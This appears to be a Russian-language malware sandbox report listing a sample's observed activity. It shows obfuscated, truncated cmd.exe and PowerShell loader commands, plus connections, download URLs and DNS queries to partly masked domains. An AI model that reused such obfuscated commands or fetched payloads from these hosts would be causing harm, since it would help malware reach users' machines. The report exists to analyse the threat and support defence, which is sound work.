Техническая информация
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\CMD.ExE /c "SeT FKS=$60hXi= " ) )421]rAHC[,)87]rAHC[+901]rAHC[+05]rAHC[( ecAlPer- 63]rAHC[,)98]rAHC[+501]rAHC[+05]rAHC[(EcAlpERC- 93]rAHC[,)09]rAHC[+97]rAHC[+001]rAHC[(EcAlpE...
- 'mi##hak.com':80
- 'ra##r.ru':80
- 'ra##r.ru':443
- http://mi##hak.com/Ammv5OK
- http://ra##r.ru/Puaie5a5U
- http://ra##r.ru/Puaie5a5U/
- 'ra##r.ru':443
- DNS ASK mi##hak.com
- DNS ASK ra##r.ru
- DNS ASK mi###rium.com
- DNS ASK vo####ailand.com
- DNS ASK ho##ey73.ru
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\CMD.ExE /c "SeT FKS=$60hXi= " ) )421]rAHC[,)87]rAHC[+901]rAHC[+05]rAHC[( ecAlPer- 63]rAHC[,)98]rAHC[+501]rAHC[+05]rAHC[(EcAlpERC- 93]rAHC[,)09]rAHC[+97]rAHC[+001]rAHC[(EcAlpE...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "SeT FKS=$60hXi= " ) )421]rAHC[,)87]rAHC[+901]rAHC[+05]rAHC[( ecAlPer- 63]rAHC[,)98]rAHC[+501]rAHC[+05]rAHC[(EcAlpERC- 93]rAHC[,)09]rAHC[+97]rAHC[+001]rAHC[(EcAlpERC- 43]rAHC[,)05]rAHC[+2...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( 'SV' ) 1zqoH ( [type](\"{0}{2}{1}\"-f 'eNviR','NMENT','o') ) ;( ( & ( 'gi' ) varIAble:1ZQOH).\"Va`lUE\"::( \"{2}{5}{1}{4}{3}{6}{0}\" -f 'ABle','nmE','g','VaR','nt','ETeNViro','I' )....